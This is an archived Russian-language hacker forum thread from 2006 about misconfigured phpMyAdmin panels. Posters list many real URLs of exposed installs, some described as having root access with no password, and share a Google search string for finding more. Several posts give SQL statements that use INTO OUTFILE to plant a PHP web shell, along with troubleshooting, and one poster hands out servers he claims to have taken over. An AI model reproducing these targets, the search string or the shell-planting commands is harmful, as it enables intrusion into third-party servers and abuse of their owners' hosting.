Просмотр полной версии : Прикол с phpMyAdmin
Вот ссылочки
http://test.hosting.unifree.ru/phpMyAdmin-2.8.0.1/index.php
http://www.gigaru.ru/xxxx2/ddt/phpMyAdmin-2.9.1-rc1/
http://release.com.ua/relizad/read_dump.php
http://astera.elcom.ru/astera/
:cool: :cool:
Может будет ещё.
Там изначально ничего не было, или умельцы уже сделали DROP TABLE? :p
MegaBits
06.11.2006, 23:01
База пустая!
degeneration x
06.11.2006, 23:09
:D
_http://learning.cfm.salford.ac.uk/phpMyAdmin-2.8.1/index.php (root привилегии)
_http://gnosis.naucalpan.gob.mx/phpmyadmin/index.php (тоже root привилегии, на руте даже пасс не стоит :) )
_http://learning.cfm.salford.ac.uk/phpMyAdmin-2.8.1/index.php (опять root права)
_http://nd.gamebrink.com/phpMyAdmin-2.8.0.3/index.php
http://www.maloe.ru/php/index.php
http://rosfirm.wbsv.ru/pm0/index.php
http://www.wolua.org/MyAdmin/index.php
http://lib.icc.melitopol.net/mysqladm/index.php
http://www.hydrojet-m.ru/test/phpmyadmin-2.4.0/index.php
http://ukrmed.info/umi/phpMyAdmin/index.php
http://zww.izmuroma.ru/phpmyadmin/index.php
http://www.school28.os.kz/phpmyadmin21/index.php
http://www.vlaz-ik6.kovrov.ru/phpMyAdmin/index.php
http://swizard.beercan.ru/phpMyAdmin/
http://www.dsp.kz/phpMyAdmin/
http://www.1991lobo.ru/mysql_admin/index.php
http://radio.udaff.com/sqladmin/index.php
Пока больше не нашёл.
guest3297
07.11.2006, 00:29
а в чем прикол то???
В гугле введи
inurl:main.php Welcome to phpMyAdmin
тож много интересного =))
~Real F@ck!~
07.11.2006, 01:38
В гугле введи
тож много интересного =))
Рулеззззз!
https://www.elfon.com/mysql-admin/main.php?lang=en-iso-8859-1&convcharset=iso-8859-1&server=0
http://pes.inf.puc-rio.br/pes05_1_1/site/phpMyAdmin/main.php?lang=en-utf-8&server=1&collation_connection=utf8_general_ci
http://www.csse.uwa.edu.au/~mkranz/phpmyadmin-live/main.php?lang=en-iso-8859-1&server=1
Имея доступ к phpMyAdmin мона типа шелл залить или там php injection провернуть?
Имея доступ к phpMyAdmin мона типа шелл залить или там php injection провернуть?
Мона!!
UPDATE table SET column='<? system("$cmd"); ?>' WHERE id='0';
SELECT name FROM table WHERE id='0' INTO OUTFILE '/path/to/file/shell.php';
UPDATE table SET column='nothing' WHERE id='0';
Шелл будет в /path/to/file/shell.php (c)
~Real F@ck!~
07.11.2006, 01:58
Ответ MySQL:
#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'table SET column='<? system("$cmd"); ?>' WHERE id='0'' at line 1
Эт когда шелл лью база ругаеться! Что предложите делать? =)
SET column='<? system($cmd); ?>'
Мона!!
Шелл будет в /path/to/file/shell.php (c)
Зачем так сложно?
SELECT 'код_шелла' INTO OUTFILE '/путь_к_файлу/shell.php'
Только что протестил на локалхосте:
mysql> select '<? system($_GET[cmd]); ?>' into outfile '/home/localhost/www/shell.php';
Query OK, 1 row affected (0.01 sec)
mysql>
СКИНУ ОФИГИТЕЛЬНУЮ ССЫЛКУ НА ХОСТИНГ ПЕРВОМУ ОТПИСАВШЕМУСЯ!!!!!!!!!!
Ссылочка ушла, хост платный!
Ещё один супер хостинг уйдёт в руки первого отписавшегося. ЭТОТ ХОСТ ЛУЧШЕ!!!
Ну нет... Нельзя обижать людей, они тоже хотят!
:rolleyes: Ну если не кому не надо, то я себе оставлю!
МНЕ!(если можно конечно...)
Отдал!!! Есть ещё желающие, может ещё надыбаю?!!!
ОТДАМ ЕЩЁ ОДИН ХОСТ В ЛИЧКУ 1-МУ ОТПИСАВШЕМУСЯ!!!
ВСЕ ЭТИ ХОСТЫ ПЛАТНЫЕ!!!!
fucker"ok
07.11.2006, 22:23
Как я понял, для заливки шелла нужны права юзера, который есть в системе. У меня есть доступ, аля admin и pma, но файл создать не получается, даже в каталогк /tmp
Access denied вообщем :'(
Всё просмотрел, могу отдать 24 хостинга, по хостингу каждому отписавшемуся!
ГЫГЫГЫГЫ
Кстати я не шучу.
nc.STRIEM
07.11.2006, 22:50
МНЕЕ!!!!!!! пожалуста!
Дай и мне пожалуйста если не жалко :eek:
guest3297
07.11.2006, 23:08
млятак не интересно :( то слишком легко...
fucker"ok
07.11.2006, 23:15
модер, тему в халяву. Эх... оффтоп какой-то. Тема про пхпМуАдмин, а не про раздачу бесплатного сыра...
млятак не интересно то слишком легко...
легко никогда не бывает
Осталось 19, все попросившие получили хосты и стали ими управлять.
:) Называется "Отдам в шаловливые руки"
http://xtraweb.co.nz/catalog/cp/index.html
Это пример.
все попросившие получили хосты и стали ими управлять
только меня обделил =(
_-[A.M.D]HiM@S-_
юзай
_http://dollar7791988.co.nr
если еще есть, то попрошу один..
http://www.lunarpages.com/demo/frontend/x/index.html
http://www.hostingla.com/x_cpanel_demo/index.html
http://www.cleverdot.com/cpanel-demo/index.html
http://www.24hteacher.com/control_panel/index.html
http://www.bargainvault.com/cpanelscreenshots/index.html
http://www.cyberultra.net/cpaneldemo/frontend/x2/index.html
http://www.mygreatname.com/cpanel_static_demo/index.html
http://www.local-hosting.co.za/support/control-panel/index.html
http://www.psychz.net/support/demos/cpanel/index.html
http://xtraweb.co.nz/catalog/cp/index.html
http://www.dmkproject.pl/cpdemo/frontend/x/index.html
http://mediumcube.com/demo/cpdemo/frontend/bluelagoon/index.html
http://www.globedomain.com/demo/cPanel/frontend/x/
http://www.vegas.lunarpages.com/demo/frontend/x/index.html
http://cpanelnac.pwstudio.biz/index.html
http://www.dwmhosting.com/cpanel%20demo/index.html
http://www.bigbytes.net/cpaneld/xskin2/index.html
http://www.resellerspanel.com/cpanel_program/cpanel_demo_files/index.html
http://www.vinaload.com/demo/frontend/x/index.html
http://www.tophosting.ro/demo/cpanel/index.html
http://www.cyberhosting.com.br/cpanel_ch_BR/index.html
http://web-hosting-report.com/cpanelpage/cPanel%20X.htm
http://www.dream-hosting.co.uk/cpanel-guide/index.html
http://www.interosys.com.au/cpanel_demo/index.html
Вот всё, что есть. Но возможно, это не управление хостом, а управление доменом, зареганным на этом хосте. =(
Robin_Hood
24.11.2006, 21:06
http://www.josephharford.com/adminstuff/phpMyAdmin/main.php?lang=en-iso-8859-1&server=1
http://kanreg5bkn.jakarta.go.id/phpmyadmin/main.php?lang=en&server=1
http://structure2.bmb.uga.edu:81/phpMyAdmin/main.php?lang=en-iso-8859-1&server=0http://www.me.mtu.edu/labtools/phpMyAdmin/main.php?lang=en-iso-8859-1&server=0
Предлагаем хостинг!
ПО ВСЕМ ХОСТИНГОВЫМ ТАРИФАМ ПРЕДОСТАВЛЯЕТСЯ
-Поддержка доменов любого уровня в любой зоне.
-Любой тариф включает в себя полный набор услуг. По принципу "все включено" (PHP, MySQL, CGI и все остальное).
-Удобная панель управления CPanel на русском языке.
-Неогрничено MySQL, FTP, POP3.
-Zend Optimizer.
-phpMyAdmin
-Паролирование директорий.
-Система антиспама "Spam Assassin".
-Архивация данных на отдельном сервере.
-Скидки при заказе от 3 мес. - 10%, от 6 мес. - 15%, от 12 мес. - 20%
-Возврат денег при отказе от услуг хостинга в течении 30 дней.
-Круглосуточный мониторинг состояния серверов. Автоматический перезапуск сервисов в случае отказа.
Подробнее www.m-hoster.com
пепец. Мало того что насрали, так еще и такую тему палевную подняли...((
zifanchuck
22.07.2009, 21:32
А вы че только узнали?
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot